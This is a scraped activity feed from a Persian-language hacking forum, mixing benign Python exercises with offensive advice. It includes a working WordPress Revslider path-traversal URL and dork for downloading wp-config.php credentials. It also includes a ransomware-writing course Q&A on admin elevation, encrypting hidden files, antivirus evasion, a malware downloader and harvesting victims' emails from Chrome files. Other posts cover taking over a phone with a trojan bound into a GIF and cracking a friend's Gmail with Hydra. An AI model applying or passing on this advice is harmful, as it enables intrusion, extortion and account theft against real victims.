discord icon
سرور دیسکورد گاردایران

تمامی فعالیت ها

این جریان به طور خودکار بروزرسانی می شود     

  1. ساعت گذشته
  2. امروز
  3. اره میشه، اولا باید طرف به مودمی که مال شماس و شما وصلین باید وصل باشه. مرحله بعد ساخت لینک مخربه که با armitage در کالی لینوکس کارتون خیلی راحت تر میشه. بعد لینکو براش ارسال میکنین و طرف باز میکنه و با دانلود شدن یک گیف که تروجان داخلش بایند شده باشه گوشی طرف توو دستتون میوفته. فقط موضوع اصلی برمیگرده به لوکال هاستتون که باید در طرف به مودم یا روتر شما وصل باشه تا سایتتون براش بالا بیاد. حتی میتونین با یک اپلیکیشن کوچیک سرور ftp رو روی گوشی طرف فعال کنین که البته باید از مهندسی معکوس استفاده کنین.
  4. سلام دوست عزیز هیچی غیرممکن نیست ولی هک سیستم فقط با شماره تلفن همراه خیلی حیلی کار پیچیده ایه و فقط افرادی با تجربه خیلی بالا و حرفه ای میتونن انجامش بدن اگه سیستم طرف ویندوزی بود خیلی کار راحت تر میشد چون فایل نیاز به نصب شدن نداره... ولی اندروید یا ios اینجوری نیست و حتما باید اپلیکیشن ها نصب بشن تا اجرا بشن یعنی اگه خواستین به گوشی طرف دسترسی پیدا کنین تنها راه اینه که بهش یه فایل نصبی (مثلا apk) بدین تا نصب کنه
  5. خواهش می کنم. وقت کردم ریکورد می کنم قرار میدم. میتونید به تاپیک مربوطه مراجعه کنید و گزینه "دنبال کردن" رو انتخاب کنید تا وقتی قسمت جدید آماده شد بهتون از طریق ایمیل خبر داده بشه. این تاپیک داره به اسپم شدن کشیده میشه. خواهشا دیگه اینجا پستی ارسال نکنید و اگر بازم سوالی دارید شخصی بپرسید.
  6. واقعاا ممنونم . خیلی کامل توضیح دادید یه سوال قسمت های بعدی کی میاد؟
  7. دیروز
  8. Balcon

    WordPress Plugin Slider REvolution

    36554.txtببخشید اشتباه شد اینه
  9. سلام دوستان یک سوال داشتم ازتون، راهی وجود داره که از طریق شماره تلفن گوشی یک فرد رو هک کرد به صورتی که بشه به فایل های (عکس، ویديو، pdf و...) موجود در گوشی اون فرد دسترسی پیدا کرد؟ اگه این روش یا روش بهتری رو بلدید ممنون میشم جواب این تاپیک رو بدید 🙏
  10. لطف کنید به جلسه چهارم از قسمت اول رو مراجعه کنید. ما با ایمیل تارگت اصلا کاری نداریم، با ایمیلی که خودمون قبلا ساختیم اطلاعات رو ارسال می کنیم. من برای آموزش این کار رو کردم تا یه روش رو حداقل گفته باشم. تو همون جلسه هم گفتم، این کار مناسب نیست و بهتره به هاست خودتون اطلاعات رو بفرستید. یه api ساده بنویسید میتونه اینکار رو براتون انجام بده. فایل های مخفی شده فقط از دید یوزر مخفی میشن، باج افزار ما حتی فایل های داخل Recycle bin هم انکریپت می کنه. باج افزار ما دسترسی ادمین داره و میتونه هر فایلی رو پیدا و انکریپت کنه، اصلا مهم نیست که چجور مخفی شده، حتی اگر با نرم افزار های اختصاصی مخفی شده باشه ویندوز فایل رو برای ما مخفی نمی کنه و باج افزار همه فایل هایی که بهش دستور دادید رو انکریپت می کنه. وقتی باج افزار رو با PyInstaller به فایل exe تبدیل می کنید میتونید از پارامتر windowed-- استفاده کنید تا کنسول مخفی بشه. دیگه این کارا نیاز نیست. استفاده از ماژول های اضافی مثل تکینتر در باج افزار باعث کندی سرعت میشه و این به شدت روی باج افزار تاثیر میزاره. به همین علت از انجام این کار صرف نظر می کنیم. میتونید از کتابخونه time استفاده کنید و هر وقت خواستید دستور اجرا به برنامه بدید. اما این کار پیشنهاد نمیشه، برای این کار باید اسکریپتی تمام مدت در حال اجرا باشه تا وقتی زمان معین شده فرا رسید برنامه رو اجرا کنه، تارگت احتمال داره شک کنه. چون سرعت سیستم افت میکنه و این خیلی مشکوک به نظر میاد. همچنین بودن باج افزار روی سیستم بدون اینکه اجرا بشه خطرناکه و احتمال لو رفتنش به شدت بالا میره. یکم صبر کنید انواع و اقسام ویروس های خطرناک رو به باج افزار اضافه می کنیم که نیاز به اینکار نباشه. ایجاد ترافیک اضافه اصلا کار مناسبی نیست. اسکریپت های پرایوت هستند که این کار رو بکنند، ابزار هایی مثل onelinepy که پابلیک شدن قابل اطمینان نیستند و حتما روش انکد کردنشون رو آنتی ویروس ها دارند. موفق باشید🌷
  11. مرسی از شما و راهنمایی کاملتون برای جمیل هم منظورم این بود که وقتی میخوایم کلید از جمیل قربانی برای ما ارسال بشه ما باید جمیل قربانی رو داشته باشیم از قبل حالا با توجه به این موضوع چطوری میتونیم جیمیلش رو به دست بیاریم؟ چند تا سوال دیگه هم داشتم این که این باج افزار میتونه فایل های هیدن قربانی هم رمز نگاری بکنه؟ میتونیم کاری کنیم که ۳ روز بعد از اجرای اسکریپت ؛ اون باج افزارمون شروع به کار بکنه؟(اگه اره ؛ چطوری؟) و این که یه پیشنهاد هم دارم برای اموزش هاتون در مورد باج افزار نویسی با پایتون این هست که بیاین و کنسولش رو مخفی کنید و به جاش به طرف یه باکس ارور الکی نشون بده (استفاده از مهندسی اجتماعی) تا طرف بیخیال بشه و بگه که این خرابه و ولش کنه بره میتونید با تکینتر یا ماژول های دیگه این کار رو بکنید از این سایت هم میتونید استفاده کنید : https://www.w3-farsi.com/posts/34431/messagebox-in-tkinter/ و این که توی باج افزارمون یه دانلودر ویروس هم بگذاریم که مثلا بیاد و بره اون ویروس رو دانلود و نصب کنه (مثال: ماژول wget تو پایتون) و مثلا دسترسی هم از سیستمش بگیریم و پیشنهاد بعدیم هم که این هست که بیاین و با ابزار onelinepy اول اون اسکریپت باج افزارمون رو که با پسوند .py هست رو در لینوکس رمز نگاری کنیم که انتی ویروس رو دور بزنه و بعد به فایل اجرایی و .. تبدیلش بکنیم امیدوارم تا حدی به ادامه دادن این دوره کمک کرده باشم
  12. Khof

    WordPress Plugin Slider REvolution

    فایل اکسپلویدو اپلود کن.
  13. سلام یه اکسپلویته خوب پیدا کردم برا وردپرس تارگتاشم زیاده نمیدونم شایدم قبلا دیدین 😐 باهاش میشه فایل مهمی رو از سایت دانلود کرد که توش رمز و یوزر دیتابیس هست 😐 دورک : "revslider.php "index of بعضیاشون 404 میاره یا ارور دسترسی اما خیلیاشونم راحت کار میکنه و فایل دانلود میشه مثلا تارگت ما https://target.com/wp-content/plugins/revslider لینکو اینطوری میکنیم : https://target.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php بعد یه فایل خود به خود دانلود میشه خدانگهدار.
  14. سلامی دوباره دوستان. دوستان من برای برگردوندن جیمیل دوستم باید چیکار کنم؟ کسی میتونه کمک کنه؟ خواهش میکنم چون دوستم جیمیلشو شدیدا نیاز داره.
  15. هفته گذشته
  16. سلام داداش امنیت جمیل بالا رفته خیلی وقته و نمیشه با هیدرا کرک کرد
  17. سلام خسته نباشید. دیروز برای برگردوندن جیمیل یکی از دوستانم داشتم پسوردشو کرک میکردم اونم با ابزار هایدرا. اما متاسفانه همش پسورد اشتباهو میداد و میگفت این پسورد اشتباه درسته. یک ابزار brute force بهتر برای اینکه واقعا کرک کنه سراغ ندارید؟ یا اگرم کسی میتونه درمورد هایدرا کمکم کنه، ممنون میشم. اینم اضافه کنم بعد کرک هربار یک پسورد جدید میداد و میگفت پسوردتون درسته.
  18. سلام نظر لطفتونه در صورتی که با PyInstaller کار می کنید کافیه پارامتر uac-admin-- رو در آخر دستور قرار بدید تا فایل خروجی هنگام اجرا نیاز به دسترسی ادمین داشته باشه. ویندوز 7 به پایین رو میشد با اکسپلویتی بدون درخواست یوزر با دسترسی ادمین اجرا کرد، تو اینترنت هست بگردید پیدا میشه. فعلا اکسپلویت پابلیکی نیست که بتونه همچین کاری با ویندوز 8 یا 10 انجام بده، چون این دو ویندوز هنوز توسط مایکروسافت ساپورت میشن. اما ویندوز 7 دیگه عملا منسوخ شده و به جمع ویندوز xp و 98 و ویندوز های قدیمی پیوسته. هر مروگرقسمتی داره که اطلاعاتش رو در اون نگه می داره. حالا تو هر کدوم متفاوته. واسه همین روش ثابتی نیست که بشه هر چی ایمیل تو یه سیستم هست جمع آوری کرد. مثلا مرورگر کروم در فایلی اطلاعات مهمی نگه میداره. ایمیل تارگت به همراه اطلاعات خیلی زیاد دیگه ای همیشه درش هست. C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Preferences می تونید با یکم تحقیق توی گوگل محلی که مرورگر ها اطلاعات حیاتی رو نگه میدارند رو پیدا کنید اون فایل رو برای خودتون ارسال کنید. یا اسکریپتی بنویسید که ایمیل رو از اون فایل جا کنه و نمایش بده.
  19. سلام خسته نباشید ببخشید من تازه با سایت شما اشنا شدم و دوره ی باج افزار نویسی با پایتونتو واقعا عالیه فقط یه سوال اگه ما بخوایم اسکریپت پایتونیمون با دسترسی ادمین اجرا بشه بعد از این که به فایل اجرایی تبدیل شد باید چی کار کنیم؟ و این که چطوری ایمیل شخص قربانی رو پیدا کنیم؟
  20. simorgh

    ردیابی هکر

    دقیقا درسته به عبارت دیگ یک هکر علاوه بر تخصصای مربوطه باید کامل با علم جرم شناسی آشنا باشه تا موفق عمل کنه
  21. SRX

    ماشین حساب!

    سلام همون طور که قبلا که گفتم قراره یک دوره آموزشی با عنوان پایتون گرافیکی در سطوح مقدماتی تا حرفه داخل انجمن قرار داده بشه. ولی این چند وقته به طرز وحشتناکی کار سرم ریخته و متاسفانه نمیتونم دوره رو شروع کنم. از اونجایی هم که در ایران دوره مشابهی نیست، نمیخوام سرسری یه چیز رو توضیح بدم. بلکه میخوام دوره ای مناسب برای همه افراد تهیه بشه تا همه بتونن ازش استفاده کنند. برنامه ای که الان نوشته شده، چیزی هست که بعدا در دوره آموزشی کاملا بهش می پردازیم و حتی بهترش می کنیم. برنامه با فریمورک PyQt نوشته شده و هدفش فقط و فقط آشنایی شما با نحوه نوشتن برنامه به این سبک هستش. تا اونجایی که تونستم واضح نوشتم تا هر کسی که به پایتون مسلطه بتونه متوجه نحوه عملکرد اسکریپت بشه. برای اجرای اسکریپت به PyQt5 نیاز خواهید داشت. pip3 install PyQt5 تصاویری از محیط گرافیکی فایل دانلودی -> پسورد: guardiran.org لینک اصلی لینک کمکی موید باشید🌷
  22. Mr.Python

    تمرین برنامه نویسی با پایتون

    -سوال : برنامه ای بنویسید که، یک رشته، از کاربر دریافت کند که این رشته، حاوی کاراکتر های مختلفی است. از جمله h e l l o که برای ما این کاراکتر ها مهم تر از بقیه هست و باید کاراکتر های h e l l o به ترتیب ذکر شده، در رشته، وجود داشته باشن. به طور مثال weheeellloooow یک رشته، هست که ترتیب hello در ان رعایت شده (دقت کنید که تکرار حروف مجاز است). رشته دیگری را در نظر بگیرید : gggfs344hhhheeeettjjjooolll1ssw ترتیب حروف hello در این رشته ، اشتباست چون از سمت چپ داریم : heol (دقت کنید که وجود هر کاراکتری مجاز هست و فقط ما میخوایم که ترتیی حروف hello تو رشته درست باشه و چیزی مثل hlloe یا... نداشته باشیم.) حروف بزرگ H E L O هم مجاز نیست ولی سایر حروف و کاراکتر ها میتونن به صورت حروف بزرگ تو رشته ظاهر بشن مثلا ssTuFhheeellow حالا باید برنامه رو جوری بنویسیم که وقتی بهش رشته، ای رو میدیم مشخص کنه ترتیب حروف helo توش رعایت شده جوابو پایین میذارم import re def find(string): if len(re.compile("h+[^hHeELlOo]*e+[^hHeELlOo]*l+[^hHeELlOo]*o+[^hHeELlOo]*").findall(string))==0: return False else: return True a=["553nhghhettlloo" , "heeyyyuuulllo", "737hdhsheelllow", "hee62626lltoow", "hhhelleoo", "hello", "helo", "oloowh", "enoughellllllllllowo"] for i in a: print(i, find(i)) من اینجا یه لیست a تعریف کردم و توش چند تا مثال نوشتم که درستی برنامه رو بتونیم تست کنیم. تو تابع find میتونید به صورت یک خط هم بنویسید : return len(re.compile("h+[^hHeELlOo]*e+[^hHeELlOo]*l+[^hHeELlOo]*o+[^hHeELlOo]*").findall(string))==0
  23. Mr.Python

    تمرین برنامه نویسی با پایتون

    -سوال : اعداد اول بین 2 تا 30 جواب به دو روش زیر : def isprime(number): if number%2==0 and number!=2: return False if number==2: return True for i in range(3, int(number**(1/2))+1,2): if number%i==0: return False return True a=2 b=30 print("".join([i for i in range(a, b+1) if isprime(i)])) #2 a=2 while a<30 : b=2 while b<=(a/b): if not a%b: break b+=1 if b> (a/b): print(a, "is prime") a+=1 تو روش دوم هم میشه list comprehension زد اینچه چرا اینکارو کردیم، دلیل خیلی خاصی نداره.. ولی خب از نظر performance ظاهرا بهتر از for loop print هست..
  24. Mr.Python

    تمرین برنامه نویسی با پایتون

    صورت سوال : https://www.codewars.com/kata/5a25ac6ac5e284cfbe000111/train/python حل به دو روش زیر : #1 dc={0:"R",1:"G",2:"B"} dct = {v: k for k, v in dc.items()} st="RGBGRGGB" def get(s1,s2): if s1==s2:return s1 else:return dc[3-(dct[s1]+dct[s2])] while st: print(st) st="".join([get(st[n],st[n+1]) for n in range(len(st)-1)]) #2 a="BGR" def get(s1,s2): if s1==s2:return s1 else:return a.replace(s1,"").replace(s2,"") s=input("").replace(" ","") while s: print(s) s="".join([get(s[n],s[n+1]) for n in range(len(s)-1)])
  25. RT3N

    ردیابی هکر

    به مطلب srx عزیز اضافه میکنم که اگر بصورت تخصصی قصد دارید موضوع رو دنبال کنید کلید واژه "فارنزیک" / "Forensic" رو جستجو کنید .... این شاخه مربوط به جرم شناسی میشه و ابزار ها و علم خاص خودش رو داره نفوذگر های حرفه ای (خالقان اثر ) به این موضوع اشراف دارند ولی کسانی که از ابرازهای اماده استفاده میکنند اشرافی به این موضوع ندارند موارد اینچنینی تمایز ایجاد میکنه بین شاخه نفوذ و شاخه جرم شناسی... موفق باشید/
  26. SRX

    ردیابی هکر

    سلام ردیابی نفوذگر در راحت ترین حالت توسط شناسایی ترافیک استفاده شده اون انجام میشه. چیزی که متاسفانه هر کسی بهش توجه نداره و همین باعث لو رفتنش میشه. میتونید با نرم افزار های زیادی ترافیک اینترنت تلفن رو مورد بررسی قرار بدید و موارد مشکوک رو گزارش کنید. همچنین اگر تخصص داشته باشید با مهندسی معکوس رات میتونید یه اطلاعاتی از هکر در رات پیدا کنید (این اطلاعات بسته به مهارت نویسنده رات ممکنه متفاوت باشه) خیلی از رات ها مشکلاتی دارند و میشه از اونا استفاده کرد تا نفوذگر رو پیدا و شناسایی کرد. این مشکلات اغلب توسط افراد ناشی و افرادی که نمیدونند دارند با چه راتی کار می کنند نشات میگیره. چیزی نیست که بتونم در غالب یک تاپیک بگم، اما شناسایی هکر یا نفوذگر خودش راهکار هایی داره و از بزرگ تا کوچک معمولا یه جا بند رو آب دادن و میشه از همون جا هکر رو پیدا کرد. در مورد سوال دومتون باید بگم بله. یه مقدار کارو سخت میکنه اما غیر ممکن نمیکنه. امنیت هیچ وقت صد در صد نیست، حتی برای هکر ها!
  27. سلام کسی میدونه که چطور میشه هکری که با فایل رت تلفن اندرویدی یک فرد رو هک کرده ردیابی کرد؟ و اگه این هکر سیستم عامل خودش رو پاک کنه باز هم قابل ردیابی هست؟
  1. نمایش فعالیت های بیشتر